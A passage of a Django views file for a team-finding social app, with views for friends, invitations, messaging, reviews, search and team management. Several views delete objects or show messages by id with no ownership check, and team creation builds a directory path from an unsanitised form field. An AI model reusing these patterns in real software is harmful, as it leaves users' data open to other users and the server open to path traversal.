HttpResponseRedirect(reverse('user_overview', args=(logged_in_user.id,)))\n\telse:\n\t\tuser_status_form = forms.UserStatusForm()\n\n\tpaginator = Paginator(user_status_list, 5)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\t\t\n\treturn render(request, 'user_overview.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_status_form':user_status_form, 'user_status_list':user_status_list, 'pages':pages, 'friendship_request_sent':friendship_request_sent, 'logged_in_user':logged_in_user, 'requested_user':requested_user, 'user_id':user_id})\n\n\n@login_required\ndef del_user_status(request, status_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tstatus = models.UserStatus.objects.get(id=status_id)\n\tstatus.delete()\n\treturn HttpResponseRedirect(reverse('user_overview', args=(logged_in_user.id,)))\n\n\n@login_required\ndef user_friends(request, user_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_user = User.objects.get(id=user_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tfriends_list = models.Friendship.objects.filter(Q(user=requested_user, accepted='Y') | Q(friend=requested_user, accepted='Y'))\n\n\tpaginator = Paginator(friends_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_friends.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'friends_list':friends_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_user':requested_user, 'user_id':user_id})\n\n\n@login_required\ndef user_requests(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_requests_list = models.Friendship.objects.filter(user=logged_in_user, accepted='I')\n\n\tpaginator = Paginator(user_requests_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_requests.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_requests_list':user_requests_list, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef friendship_processing(request, request_id, accepted):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tinvitation = models.Friendship.objects.get(id=request_id)\n\n\tif accepted == '1':\n\t\tinvitation.accepted = 'Y'\n\t\tinvitation.save()\n\t\treturn HttpResponseRedirect(reverse('user_requests'))\n\tif accepted == '0':\n\t\tinvitation.delete()\n\t\treturn HttpResponseRedirect(reverse('user_requests'))\n\n\n@login_required\ndef unfriend(request, request_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tfriend = models.Friendship.objects.get(id=request_id)\n\tfriend.delete()\n\treturn HttpResponseRedirect(reverse('user_friends', args=(logged_in_user.id,)))\n\n\n@login_required\ndef user_teams(request, user_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_user = User.objects.get(id=user_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tteams_list = models.Membership.objects.filter(user=requested_user)\n\n\tpaginator = Paginator(teams_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_teams.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'teams_list':teams_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_user':requested_user, 'user_id':user_id})\n\n\n@login_required\ndef user_invitations(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_invitations_list = models.Invitation.objects.filter(user=logged_in_user, accepted='I')\n\n\tpaginator = Paginator(user_invitations_list, 20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_invitations.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_invitations_list':user_invitations_list, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef invitation_processing(request, request_id, accepted):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tinvitation = models.Invitation.objects.get(id=request_id)\n\n\tif accepted == '1':\n\t\tinvitation.accepted = 'Y'\n\t\tinvitation.save()\n\t\tinvitation_team = models.Membership.objects.create(user=logged_in_user, team=invitation.team)\n\t\tinvitation_team.save()\n\t\treturn HttpResponseRedirect(reverse('user_invitations'))\n\tif accepted == '0':\n\t\tinvitation.delete()\n\t\treturn HttpResponseRedirect(reverse('user_invitations'))\n\n\n@login_required\ndef leave_team(request, membership_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tmembership = models.Membership.objects.get(id=membership_id)\n\tmembership.delete()\n\treturn HttpResponseRedirect(reverse('user_teams', args=(logged_in_user.id,)))\n\n\n@login_required\ndef user_reviews(request, user_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_user = User.objects.get(id=user_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_reviews_list = models.UserReview.objects.filter(user=requested_user)\n\n\tpaginator = Paginator(user_reviews_list, 3)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_reviews.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_reviews_list':user_reviews_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_user':requested_user})\n\n\n@login_required\ndef review_user(request, user_reviewed):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_user_reviewed = User.objects.get(id=user_reviewed)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\treview_user_form = forms.UserReviewForm(request.POST)\n\t\tif review_user_form.is_valid():\n\t\t\treview = models.UserReview.objects.create(user=requested_user_reviewed, reviewed_by=logged_in_user, rating=request.POST['rating'], content=request.POST['content'])\n\t\t\treview.save()\n\t\t\treturn HttpResponseRedirect(reverse('user_reviews', args=(requested_user_reviewed.id,)))\n\telse:\n\t\treview_user_form = forms.UserReviewForm()\n\n\treturn render(request, 'review_user.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'review_user_form':review_user_form, 'logged_in_user':logged_in_user, 'requested_user_reviewed':requested_user_reviewed})\n\n\n@login_required\ndef review_team(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\treview_team_form = forms.TeamReviewForm(request.POST)\n\t\tif review_team_form.is_valid():\n\t\t\treview = models.TeamReview.objects.create(team=requested_team, reviewed_by=logged_in_user, rating=request.POST['rating'], content=request.POST['content'])\n\t\t\treview.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_reviews', args=(requested_team.id,)))\n\telse:\n\t\treview_team_form = forms.TeamReviewForm()\n\n\treturn render(request, 'review_team.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'review_team_form':review_team_form, 'logged_in_user':logged_in_user, 'requested_team':requested_team})\n\n\n@login_required\ndef user_inbox(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_inbox_list = models.Message.objects.filter(reciever=logged_in_user)\n\n\tpaginator = Paginator(user_inbox_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_inbox.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_inbox_list':user_inbox_list, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef user_outbox(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_outbox_list = models.Message.objects.filter(sender=logged_in_user)\n\n\tpaginator = Paginator(user_outbox_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_outbox.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_outbox_list':user_outbox_list, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef message_compose(request, reciever_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_reciever = User.objects.get(id=reciever_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\tmessage_compose_form = forms.MessageForm(request.POST)\n\t\tif message_compose_form.is_valid():\n\t\t\tmessage = models.Message.objects.create(sender=logged_in_user, reciever=requested_reciever, title=request.POST['title'], content=request.POST['content'])\n\t\t\tmessage.save()\n\t\t\treturn HttpResponseRedirect(reverse('user_outbox'))\n\telse:\n\t\tmessage_compose_form = forms.MessageForm()\n\n\treturn render(request, 'message_compose.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'message_compose_form':message_compose_form, 'logged_in_user':logged_in_user, 'requested_reciever':requested_reciever})\n\n\n@login_required\ndef message_read(request, message_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_message = models.Message.objects.get(id=message_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tif requested_message.read == 'N':\n\t\trequested_message.read = 'Y'\n\t\trequested_message.save()\n\n\treturn render(request, 'message_read.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'requested_message':requested_message})\n\n\n@login_required\ndef search_category(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\tsearch_category_form = forms.CategorySearchForm(request.POST)\n\t\tif search_category_form.is_valid():\n\t\t\tcategory_list = models.Category.objects.filter(category__icontains=request.POST['category'])\n\telse:\n\t\tsearch_category_form = forms.CategorySearchForm()\n\t\tcategory_list = models.Category.objects.all()\n\t\tpages = None\n\n\tpaginator = Paginator(category_list, 20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'search_category.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'search_category_form':search_category_form, 'category_list':category_list, 'pages':pages, 'logged_in_user':logged_in_user})\n\t\n\n@login_required\ndef search_subcategory(request, category_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_category = models.Category.objects.get(id=category_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tif request.method == 'POST':\n\t\tsearch_subcategory_form = forms.SubCategorySearchForm(request.POST)\n\t\tif search_subcategory_form.is_valid():\n\t\t\tsubcategory_list = models.SubCategory.objects.filter(subcategory__icontains=request.POST['subcategory'])\n\telse:\n\t\tsearch_subcategory_form = forms.SubCategorySearchForm()\n\t\tsubcategory_list = models.SubCategory.objects.filter(category=requested_category)\n\t\tpages = None\n\n\tpaginator = Paginator(subcategory_list, 20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'search_subcategory.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'search_subcategory_form':search_subcategory_form, 'subcategory_list':subcategory_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_category':requested_category})\n\n\n@login_required\ndef search_teams_in_cat(request, category_id, subcategory):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_category = models.Category.objects.get(id=category_id)\n\trequested_subcategory = models.SubCategory.objects.get(id=subcategory)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tif request.method == 'POST':\n\t\tsearch_teams_form = forms.TeamSearchForm(request.POST)\n\t\tif search_teams_form.is_valid():\n\t\t\tteams_list = models.TeamProfile.objects.filter(name__icontains=request.POST['team'])\n\telse:\n\t\tsearch_teams_form = forms.TeamSearchForm()\t\n\t\tteams_list = models.TeamProfile.objects.filter(category=requested_subcategory)\n\t\tpages = None\n\n\tpaginator = Paginator(teams_list, 5)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'search_teams_in_cat.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'search_teams_form':search_teams_form, 'teams_list':teams_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_category':requested_category, 'requested_subcategory':requested_subcategory})\n\n\n@login_required\ndef search_teams(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\tteam_search_form = forms.TeamSearchForm(request.POST)\n\t\tif team_search_form.is_valid():\n\t\t\tteams_list = models.TeamProfile.objects.filter(name__icontains=request.POST['team'])\n\n\t\tpaginator = Paginator(teams_list, 5)\n\t\tpage = request.GET.get('page')\n\t\ttry:\n\t\t\tpages = paginator.page(page)\n\t\texcept PageNotAnInteger:\n\t\t\tpages = paginator.page(1)\n\t\texcept EmptyPage:\n\t\t\tpages = paginator.page(paginator.num_pages)\n\n\telse:\n\t\tteam_search_form = forms.TeamSearchForm()\n\t\tteams_list = None\n\t\tpages = None\n\n\treturn render(request, 'search_teams.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'teams_list':teams_list, 'team_search_form':team_search_form, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef search_users(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\tuser_search_form = forms.UserSearchForm(request.POST)\n\t\tif user_search_form.is_valid():\n\t\t\tusers_list = User.objects.filter(Q(username__icontains=request.POST['username']) | Q(first_name__icontains=request.POST['username']) | Q(last_name__icontains=request.POST['username']))\n\n\t\tpaginator = Paginator(users_list, 10)\n\t\tpage = request.GET.get('page')\n\t\ttry:\n\t\t\tpages = paginator.page(page)\n\t\texcept PageNotAnInteger:\n\t\t\tpages = paginator.page(1)\n\t\texcept EmptyPage:\n\t\t\tpages = paginator.page(paginator.num_pages)\n\t\n\telse:\n\t\tuser_search_form = forms.UserSearchForm()\n\t\tusers_list = None\n\t\tpages = None\n\n\treturn render(request, 'search_users.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'users_list':users_list, 'user_search_form':user_search_form, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_creation(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\tteam_creation_form = forms.TeamCreationForm(request.POST)\n\t\tif team_creation_form.is_valid():\n\t\t\tselected_category = models.SubCategory.objects.get(id=request.POST['category'])\n\t\t\tteam = models.TeamProfile.objects.create(name=request.POST['name'], category=selected_category, description=request.POST['description'])\n\t\t\tteam.save()\n\t\t\tnew_team = models.TeamProfile.objects.get(name=request.POST['name'])\n\t\t\tleader = models.Membership.objects.create(user=logged_in_user, team=new_team, user_type='LDR')\n\t\t\tleader.save()\n\t\t\tos.mkdir(os.path.join(settings.BASE_DIR, 'lfg_app', 'static', 'images', 'team_images', request.POST['name']))\n\t\t\tnew_team = models.TeamProfile.objects.get(name=request.POST['name'])\n\t\t\treturn HttpResponseRedirect(reverse('team_creation_success', args=(new_team.id,)))\n\telse:\n\t\tteam_creation_form = forms.TeamCreationForm()\n\n\treturn render(request, 'team_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_creation_form':team_creation_form, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_creation_success(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\treturn render(request, 'team_creation_success.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'logged_in_user':logged_in_user, 'requested_team':requested_team})\n\n\n@login_required\ndef team_management(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\tteam_management_form = forms.TeamManagementForm(request.POST, request.FILES)\n\t\tif team_management_form.is_valid():\n\t\t\trequested_team.name = request.POST['name']\n\t\t\trequested_team.recruiting = request.POST['recruiting']\n\t\t\trequested_team.country = request.POST['country']\n\t\t\trequested_team.city = request.POST['city']\n\t\t\trequested_team.address = request.POST['address']\n\t\t\trequested_team.image = request.FILES.get('image', 'default_images/default_team_img.jpg')\n\t\t\trequested_team.description = request.POST['description']\n\t\t\trequested_team.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_management', args=(requested_team.id,)))\n\telse:\n\t\tteam_management_form = forms.TeamManagementForm(initial={'name':requested_team.name, 'category':requested_team.category, 'recruiting':requested_team.recruiting, 'country':requested_team.country, 'city':requested_team.city, 'address':requested_team.address, 'image':requested_team.image, 'description':requested_team.description})\n\n\treturn render(request, 'team_management.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_management_form':team_management_form, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_about_us(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\treturn render(request, 'team_about_us.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'leader':leader, 'mods':mods, 'users':users, 'requested_team':requested_team, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_overview(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tteam_status_list = models.TeamStatus.objects.filter(team=requested_team)\n\n\tif request.method == 'POST':\n\t\tteam_status_form = forms.TeamStatusForm(request.POST)\n\t\tif team_status_form.is_valid():\n\t\t\tstatus = models.TeamStatus.objects.create(team=requested_team, content=request.POST['content'])\n\t\t\tstatus.save()\n\t\t\tHttpResponseRedirect(reverse('team_overview', args=(requested_team.id,)))\n\telse:\n\t\tteam_status_form = forms.TeamStatusForm()\n\n\tpaginator = Paginator(team_status_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_overview.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'leader':leader, 'mods':mods, 'users':users, 'team_status_form':team_status_form, 'team_status_list':team_status_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_team':requested_team})\n\n\n@login_required\ndef del_team_status(request, team_id, status_id):\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tstatus = models.TeamStatus.objects.get(id=status_id)\n\tstatus.delete()\n\treturn HttpResponseRedirect(reverse('team_overview', args=(requested_team.id,)))\n\n\n@login_required\ndef team_members(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tmembers_list = models.Membership.objects.filter(team=requested_team)\n\n\tpaginator = Paginator(members_list, 30)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_members.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'members_list':members_list, 'pages':pages, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user, 'requested_team':requested_team})\n\n\n@login_required\ndef team_membership_management(request, team_id, member_id):\n\tlogged_in_user = 